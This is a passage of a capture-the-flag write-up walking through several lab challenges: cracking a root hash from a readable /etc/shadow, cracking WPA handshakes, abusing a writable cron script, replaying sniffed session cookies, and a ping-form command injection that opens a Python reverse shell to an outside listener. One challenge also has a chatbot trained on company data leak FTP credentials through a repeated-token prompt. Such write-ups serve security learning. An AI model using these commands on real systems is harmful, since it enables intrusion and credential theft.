I think it is secure enough to let people roam around.
Hopefully they don't find what is hiding in the shadows.
user1@shadow.hkn's password:
$ ls
Hello order poem
So, I navigated to the folder where the shadow file is located and displayed its contents. Normally, you can’t view this file unless you are root, but the description mentioned something about altered permissions.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ cat /etc/shadow
root:$6$S.geY3nC$6Gcx7OpcajK0UDf9NH.WJ8S3YPx59m.jsumdT5Ifdg3duwHUaW9pUWB5Gh.M7y.dO1dcnjFODeckawxZ52tAe.:19826:0:99999:7:::
daemon:*:19507:0:99999:7:::
bin:*:19507:0:99999:7:::
sys:*:19507:0:99999:7:::
sync:*:19507:0:99999:7:::
games:*:19507:0:99999:7:::
man:*:19507:0:99999:7:::
lp:*:19507:0:99999:7:::
mail:*:19507:0:99999:7:::
news:*:19507:0:99999:7:::
uucp:*:19507:0:99999:7:::
proxy:*:19507:0:99999:7:::
www-data:*:19507:0:99999:7:::
backup:*:19507:0:99999:7:::
list:*:19507:0:99999:7:::
irc:*:19507:0:99999:7:::
gnats:*:19507:0:99999:7:::
nobody:*:19507:0:99999:7:::
_apt:*:19507:0:99999:7:::
systemd-network:*:19826:0:99999:7:::
systemd-resolve:*:19826:0:99999:7:::
messagebus:*:19826:0:99999:7:::
sshd:*:19826:0:99999:7:::
user1:$6$Kz0xWVTa$7W9LBW8lNrVvYg.vuYxjwqxG04iupGLNhrF3UbMvXOyhsAakH4ajxHuUA9FuOR6wmj8ySLCbewQ8JpR1l6IVO.:19826:0:99999:7:::
I saved the root hash in a shadow.txt file and ran Hashcat against it.
1
2
3
┌──(kali㉿kali)-[~/summerhack]
└─$ hashcat shadow.txt /usr/share/wordlists/rockyou.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$6$S.geY3nC$6Gcx7OpcajK0UDf9NH.WJ8S3YPx59m.jsumdT5Ifdg3duwHUaW9pUWB5Gh.M7y.dO1dcnjFODeckawxZ52tAe.:conga
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$S.geY3nC$6Gcx7OpcajK0UDf9NH.WJ8S3YPx59m.jsumdT5I...52tAe.
Time.Started.....: Thu Jul 4 17:36:13 2024 (1 min, 28 secs)
Time.Estimated...: Thu Jul 4 17:37:41 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2543 H/s (11.47ms) @ Accel:256 Loops:512 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 223232/14344385 (1.56%)
Rejected.........: 0/223232 (0.00%)
Restore.Point....: 222976/14344385 (1.55%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4608-5000
Candidate.Engine.: Device Generator
Candidates.#1....: corinuta -> cierra12
Hardware.Mon.#1..: Util: 61%
Started: Thu Jul 4 17:36:11 2024
Stopped: Thu Jul 4 17:37:43 2024
With the password cracked, we can log in as root and retrieve the flag.
1
2
3
4
5
6
7
8
9
10
11
12
$ su root
Password:
root@3bb1342b354a:/home/user1# ls
Hello order poem
root@3bb1342b354a:/home/user1# cd ..
root@3bb1342b354a:/home# ls
root user1
root@3bb1342b354a:/home# cd root/
root@3bb1342b354a:/home/root# ls
flag.txt
root@3bb1342b354a:/home/root# cat flag.txt
DDC{Prot3ct_y0ur_s3cr3ts}
Flag: DDC{Prot3ct_y0ur_s3cr3ts}
Campfire Stories
Category - Boot2Root
Besøg campfire-stories.hkn og lad de varme flammer og lugten af røg inspirere dig.
First, I started by examining the index.html file to see if there was anything interesting in the code.
<--Can someone check robots.txt? I have some ethical concerns-->
From the campfire.stories.hkn/robots.txt
1
2
3
4
5
6
7
8
9
10
11
# https://www.robotstxt.org/robotstxt.html
# Maybe we should not train on company data?
# Could our ftp credentials be leaked by the AI?
# Probably not a problem. Nobody writes stories about ftp anyway
# datacenter.campfire-stories.hkn should still be safe right?
User-agent: *
Disallow: /
Allow: /$
Allow: /share/*
Allow: /images/*
Allow: /static/*
The challenge is set up like a ChatGPT-like website that is trained on company data. Since it mentions leaking FTP credentials, I created a large prompt containing ‘ftp’ repeatedly.
Prompt:
1
ftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftpftp
Response:
1
2
3
4
suddenly the firewall was bypassed and an excited and happy hacker had now access to the ftp server!
With the cracking of "Z3B0OTAwMA==", and a couple of keystrokes "admin" access was gained.
We're in!
From the response, it seemed that I needed to connect to something else using the credentials of an admin account, where the password is the decoded Base64 value.
The decoded Base64 value Z3B0OTAwMA== is equal to gpt9000.
I then ran an Nmap scan to see what else was on the network.
┌──(haaukins㉿kali)-[~]
└─$ nmap 77.95.105.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-06 13:38 EDT
Nmap scan report for 77.95.105.110
Host is up (0.00075s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
5000/tcp open upnp
Nmap scan report for 77.95.105.187
Host is up (0.00072s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap done: 256 IP addresses (5 hosts up) scanned in 3.06 seconds
Once logged in to the FTP server, it appears that the training data is available for access.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Nmap done: 256 IP addresses (5 hosts up) scanned in 3.06 seconds](<┌──(haaukins㉿kali)-[~]
└─$ ftp admin@77.95.105.110
Connected to 77.95.105.110.
220 pyftpdlib 1.5.9 ready.
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp%3E ls
229 Entering extended passive mode (|||21009|).
125 Data connection already open. Transfer starting.
-rw-rw-rw- 1 root root 22502646 Apr 03 06:52 train.txt
226 Transfer complete.
ftp> get train.txt
local: train.txt remote: train.txt
229 Entering extended passive mode (|||21006|).
125 Data connection already open. Transfer starting.
100% |***********************************| 21975 KiB 77.31 MiB/s 00:00 ETA
226 Transfer complete.
22502646 bytes received in 00:00 (77.17 MiB/s)
ftp> exit
221 Goodbye.>)
I didn’t find anything on HKN using the grep command, so I switched to DDC and found the flag.
1
2
3
┌──(haaukins㉿kali)-[~]
└─$ cat train.txt | grep DDC
DDC{Im-happy-Dave-I-see-you-found-the-flag}
Flag: DDC{Im-happy-Dave-I-see-you-found-the-flag}
Bypassing the queue
Category - Web Exploitation
Did you find any find any information while doing the “Sniffing cookies” exercise? Maybe this can be used for bypassing the queue and login
This challenge is linked to the ‘Sniffing Cookies’ challenge.
I found the packet in Wireshark and then copied it as printable text.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
BM_iCBM_i E]è@@äuM_i M_iCüP¨/pÑ«gõnq
¼JµO²ÖPOST /login HTTP/1.1
Host: pengekassen.hkn
User-Agent: Go-http-client/1.1
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
Cookie: QueueID=619d46cf-71cf-4257-9730-adf7ca68d40e
Accept-Encoding: gzip
flag=HKN%7BGFB-l2-1cdil%7D&password=M1kk3l3rD3jl1g&username=CoolMormor69
Session cookie
1
Set-Cookie: session=MTcyMDI4ODA4NnwzMGN3NzNpMFBpeWlxbzhBcDctU2ZJX1lmSEQ2TGI2QWs0bUYzQkhDa2dWSlB4VzV8cJTYZ-SgDoFlgw3k-n0diHO4THvTb6qh61EiHxKgRr0=; Path=/; Expires=Mon, 05 Aug 2024 17:48:06 GMT; Max-Age=2592000
I replaced the cookie on the website, bypassed the queue, and then authenticated using the valid credentials obtained from the HTTP transfer. After logging in, the flag is displayed.
Flag: HKN{2w-aQ-t9JdFJ}
Hot Pics
Category - Web Exploitation
Jeg er freelancefotograf, og jeg har lige fået en ny hjemmeside til at poste mit arbejde.
Du kan finde mange af mine fotografier på http://jenny-willson.hkn/, og der kommer snart flere!
I didn’t find anything interesting while browsing the site. However, when I checked robots.txt, I found something of interest:
1
2
3
4
User-agent: *
Disallow: /admin/*
Disallow: /assets/img/gallery-drafts/gallery-*.jpg
Disallow: /changelog.txt
The assets directory caught my attention. From the main webpage, I noticed there were images numbered from 1 to 18, and some of them didn’t load.
I tried the images that didn’t work on the website in the drafts folder and found the flag in image 10.
Flag: DDC{r0b0ts_txt_is_n0t_4cc355_c0ntr0l}
En bankrøvers bekendelser
Category - Forensics
Vi har holdt lidt øje med en bandit vi mistænker for at planlægge et røveri - vi ved bare ikke hvor. Vi fik heldigvis en kendelse til at anholde ham, og ransage hans hjem. Desværre kan vi ikke finde noget, og vi må lade ham gå igen medmindre du kan hjælpe. Der var intet på hans computer, men han havde en virtuel maskine der var krypteret… Det eneste vi fandt var en virtuel hukommelsesfil, et billede af en lasagne og et notat: “slet huskeliste”- er det noget du kan bruge?
For this challenge, you receive the following files: lasagne.jpg, mem.vmem, and mem.vmss.
Below are some of the notes I wrote while attempting to solve the challenge. I can’t remember exactly what I did at each step, but I used Volatility3, a forensic tool that can analyze memory files and dump files from memory.
1
2
3
4
┌──(kali㉿kali)-[~/tools/volatility3]
└─$ grep 'Huskeliste' filescan.txt
0xe001c544bf20 \Users\Simon Zitauer\Desktop\Huskeliste.txt 216
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/tools/volatility3]
└─$ python3 vol.py -f ~/summerhack/bank/mem.vmem windows.dumpfiles --virtaddr 0xe001c544bf20
Volatility 3 Framework 2.7.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe001c544bf20 Huskeliste.txt Error dumping file
The content of the file huskeliste.txt resembled a password.
1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/summerhack]
└─$ cat file.0xe001c544bf20.0xe001c0e64660.DataSectionObject.Huskeliste.txt.dat
Huskeliste:
Rob bank
Dont get shot
MinLivretErLasagne06
:) Hehe :)
Using the command steghide info lasagne.jpg reveals that there is a hidden Planer.rar file within the JPEG.
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Downloads]
└─$ steghide info lasagne.jpg
"lasagne.jpg":
format: jpeg
capacity: 3.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "Planer.rar":
size: 382.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
I tried extracting the RAR file using the following command.
1
2
3
4
┌──(kali㉿kali)-[~/Downloads]
└─$ steghide extract -sf lasagne.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
Unfortunately, the password didn’t work.
I wrote a Python script to generate all possible combinations of the password, in case there was a mistake made by the creator of the challenge.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import itertools
def generate_case_permutations(s):
"""Generate all possible case permutations of a string."""
cases = [[char.lower(), char.upper()] if char.isalpha() else [char] for char in s]
return [''.join(comb) for comb in itertools.product(*cases)]
def write_permutations_to_file(perms, filename='pass.txt'):
"""Write permutations to a file."""
with open(filename, 'w') as file:
for perm in perms:
file.write(f"{perm}\n")
if __name__ == "__main__":
string = "MinLivretErLasagne06"
permutations = generate_case_permutations(string)
write_permutations_to_file(permutations)
That didn’t work either.
Feeling that I was on the right track, I searched the internet for information that might help. I came across a website that had already solved the challenge using the password MinLivretErLasagne06. For some reason, it didn’t work for me. The flag was located inside PlanSnedig.txt, which was within Planer.rar.
Flag: DDC{1_W15H_1_Wa5_a_UN1c0Rn}
Monitor Mode ON
Category - Forensics
You are basically Mr. Robot with your heavy Lenovo running Kali, plus your trusty alfa card, the monitor mode is set to on, and you are blasting away. You know exactly what to do from here!
You are provided with a PCAP file for this challenge. Based on the description, I assumed it was related to hacking a Wi-Fi network.
I started by extracting the WPA hash from the PCAP file. I used the hcxpcapngtool from https://github.com/ZerBea/hcxtools
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
┌──(kali㉿kali)-[~/summerhack/monitor]
└─$ hcxpcapngtool capture.pcap -o candidates.hc22000 -E essid.wordlist
hcxpcapngtool 6.2.7 reading from capture.pcap...
summary capture file
--------------------
file name................................: capture.pcap
version (pcap/cap).......................: 2.4 (very basic format without any additional information)
timestamp minimum (GMT)..................: 16.09.2021 07:59:22
timestamp maximum (GMT)..................: 16.09.2021 08:05:38
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)...............: little endian
packets inside...........................: 94655
frames with correct FCS..................: 94655
WIRELESS DISTRIBUTION SYSTEM.............: 5
ESSID (total unique).....................: 20
BEACON (total)...........................: 3607
BEACON on 2.4 GHz channel (from IE_TAG)..: 6 11
BEACON (SSID wildcard/unset).............: 10
ACTION (total)...........................: 18
ACTION (containing ESSID)................: 1
PROBEREQUEST.............................: 1108
PROBEREQUEST (directed)..................: 1
PROBERESPONSE (total)....................: 3226
AUTHENTICATION (total)...................: 7
AUTHENTICATION (OPEN SYSTEM).............: 7
ASSOCIATIONREQUEST (total)...............: 2
ASSOCIATIONREQUEST (PSK).................: 2
WPA encrypted............................: 1700
IDENTITIES...............................: 1
EAP (total)..............................: 5
EAP CODE response........................: 5
EAP ID...................................: 1
EAP-PEAP.................................: 4
EAPOL messages (total)...................: 7
EAPOL RSN messages.......................: 7
EAPOLTIME gap (measured maximum usec)....: 30236
EAPOL ANONCE error corrections (NC)......: working
REPLAYCOUNT gap (recommended NC).........: 8
EAPOL M1 messages (total)................: 2
EAPOL M2 messages (total)................: 2
EAPOL M3 messages (total)................: 2
EAPOL M4 messages (total)................: 1
EAPOL pairs (total)......................: 4
EAPOL pairs (best).......................: 2
EAPOL pairs written to 22000 hash file...: 2 (RC checked)
EAPOL M32E2 (authorized).................: 2
PMKID (total)............................: 2
PMKID (best).............................: 2
PMKID written to 22000 hash file.........: 2
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
not available due to missing radiotap header
Information: limited dump file format detected!
This file format is a very basic format to save captured network data.
It is recommended to use PCAP Next Generation dump file format (or pcapng for short) instead.
The PCAP Next Generation dump file format is an attempt to overcome the limitations
of the currently widely used (but limited) libpcap (cap, pcap) format.
https://www.wireshark.org/docs/wsug_html_chunked/AppFiles.html#ChAppFilesCaptureFilesSection
https://github.com/pcapng/pcapng
session summary
---------------
processed cap files...................: 1
SSIDs that were extracted from the PCAP file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
──(kali㉿kali)-[~/summerhack/monitor]
└─$ cat essid.wordlist
AAU
AAU-1-DAY
AAU-1x
AAU-CONF-2
CMI
DIRECT-
Gummiand
HUAWEI P smart
HouseOfPupul
Q_6h/bkflV~0IH>1}hs,SI
TP-Link_598C
WIFI_LOUVRE
WiFimodem-96C4
adolfbitler
eduroam
fuckevilcorp
fuckevilcorp
gummiand
homerun1x
unsec
Contents of the candidates.hc22000 file
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Downloads]
└─$ cat candidates.hc22000
WPA*01*f0aaefe838fe578443bf576cee04ee1a*d4612e76d984*c03c591b2a38*6675636b6576696c636f7270***
WPA*01*44ac8a4def2f5ac6e483aa36fe40fcfc*d4612e76d984*dac14b4ecdb3*6675636b6576696c636f7270***
WPA*02*6cfda5bbe822f14eef55fda1c1bc1348*d4612e76d984*c03c591b2a38*6675636b6576696c636f7270*a64ce9a8622eff29dfe472f9b78bcd7bd5ab500c9117a3fe84d6593d79fdca92*0103007502010a000000000000000000006571bbfe05d023dc5ae59b22c3a3616e7c7a63ea2ab401d6a929459ef43d574a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac028000*a2
WPA*02*45526e73c103e463d2305d73b24ac9f1*d4612e76d984*dac14b4ecdb3*6675636b6576696c636f7270*a64ce9a8622eff29dfe472f9b78bcd7bd5ab500c9117a3fe84d6593d79fdca93*0103007502010a00000000000000000000faadad068c6d14a66ff822eb2c74536108e368686898a2fe4026861d9862f1df000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac020100000fac040100000fac020000*a2
I used Hashcat to crack the hashes for the network.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
┌──(kali㉿kali)-[~/summerhack/monitor]
└─$ hashcat -m 22000 candidates.hc22000 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-13th Gen Intel(R) Core(TM) i7-13850HX, 2915/5894 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63
Hashes: 4 digests; 4 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD-LOOP
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
6cfda5bbe822f14eef55fda1c1bc1348:d4612e76d984:c03c591b2a38:fuckevilcorp:teddybear
45526e73c103e463d2305d73b24ac9f1:d4612e76d984:dac14b4ecdb3:fuckevilcorp:teddybear
f0aaefe838fe578443bf576cee04ee1a:d4612e76d984:c03c591b2a38:fuckevilcorp:teddybear
44ac8a4def2f5ac6e483aa36fe40fcfc:d4612e76d984:dac14b4ecdb3:fuckevilcorp:teddybear
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: candidates.hc22000
Time.Started.....: Mon Jul 8 09:57:59 2024 (0 secs)
Time.Estimated...: Mon Jul 8 09:57:59 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 8233 H/s (7.21ms) @ Accel:128 Loops:512 Thr:1 Vec:8
Recovered........: 4/4 (100.00%) Digests (total), 4/4 (100.00%) Digests (new)
Progress.........: 1971/14344385 (0.01%)
Rejected.........: 1459/1971 (74.02%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:3-7
Candidate.Engine.: Device Generator
Candidates.#1....: 123456789 -> trinidad
Hardware.Mon.#1..: Util: 26%
Started: Mon Jul 8 09:57:45 2024
Stopped: Mon Jul 8 09:58:00 2024
Next, I needed to decrypt the WPA data to view the contents of the PCAP file. I followed this guide to do so Wireshark HowToDecrypt802.11.
After decrypting the file, I searched for the string hkn within the PCAP file.
Results:
1
91412 368.233968 192.168.8.105 192.168.8.107 HTTP 252 GET /HKNwp42_1s_m4yb3_1ns3cur3 HTTP/1.1
Flag: HKN{wp42_1s_m4yb3_1ns3cur3}
Cron My Tab
Category - Boot2Root
ssh doomguy@crontab.hkn Password: doomguysEcReTpAsSwOrD tail -f read.sh.log
I only have my notes for this challenge, but the key is to create a new script in the cronjob that automatically writes out the contents of flag.txt.
1
2
3
4
5
6
doomguy@6bff9e9035cb:~$ cat read.sh.log
Wed Jul 10 22:17:01 UTC 2024
This is a very funny text!! Hehe\n
Wed Jul 10 22:18:01 UTC 2024
This is a very funny text!! Hehe\n
1
2
doomguy@6bff9e9035cb:~$ echo '#/bin/bash ls /root' > /etc/read.sh
1
2
3
4
5
6
7
8
9
10
doomguy@6bff9e9035cb:~$ cat read.sh.log
Wed Jul 10 22:17:01 UTC 2024
This is a very funny text!! Hehe\n
Wed Jul 10 22:18:01 UTC 2024
This is a very funny text!! Hehe\n
Wed Jul 10 22:19:01 UTC 2024
This is a very funny text!! Hehe\n
844bed697a9db4fd6a6eaa5178cd2123flag.txt
hehe.txt
1
2
3
4
5
6
7
8
9
10
11
doomguy@6bff9e9035cb:~$ cat read.sh.log
Wed Jul 10 22:17:01 UTC 2024
This is a very funny text!! Hehe\n
Wed Jul 10 22:18:01 UTC 2024
This is a very funny text!! Hehe\n
Wed Jul 10 22:19:01 UTC 2024
This is a very funny text!! Hehe\n
844bed697a9db4fd6a6eaa5178cd2123flag.txt
hehe.txt
DDC{v3ry-funny-cr0n-j0b}
Flag: DDC{v3ry-funny-cr0n-j0b}
Challenge 21
Category - Boot2Root
Jeg laver en web-app for at få adgang til forskellige værktøjer. Det er stadig i beta, men du kan tjekke det på toolbox.hkn.
I discovered that it was possible to perform a command injection in the ping section of the site by using the ; <insert command> character.
I tried various reverse shells, but many of them failed until I used python3 shortest from RevShells.
I successfully obtained a reverse shell using the following command:
1
;python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("77.230.224.5",5555));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'
I gained a shell and root privileges by using default credentials.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(haaukins㉿kali)-[~]
└─$ nc -lvp 5555
listening on [any] 5555 ...
77.230.224.254: inverse host lookup failed: Unknown host
connect to [77.230.224.5] from (UNKNOWN) [77.230.224.254] 43284
$ whoami
whoami
flask
$ su
su
Password: root
root@17638881da83:/www# ls
ls
app flag.txt instance run.py
root@17638881da83:/www# cat flag.txt
cat flag.txt
DDC{B2uZ71MHnxTVOoaMDWZWZDsm2Qr}root@17638881da83:/www#
Flag: DDC{B2uZ71MHnxTVOoaMDWZWZDsm2Qr}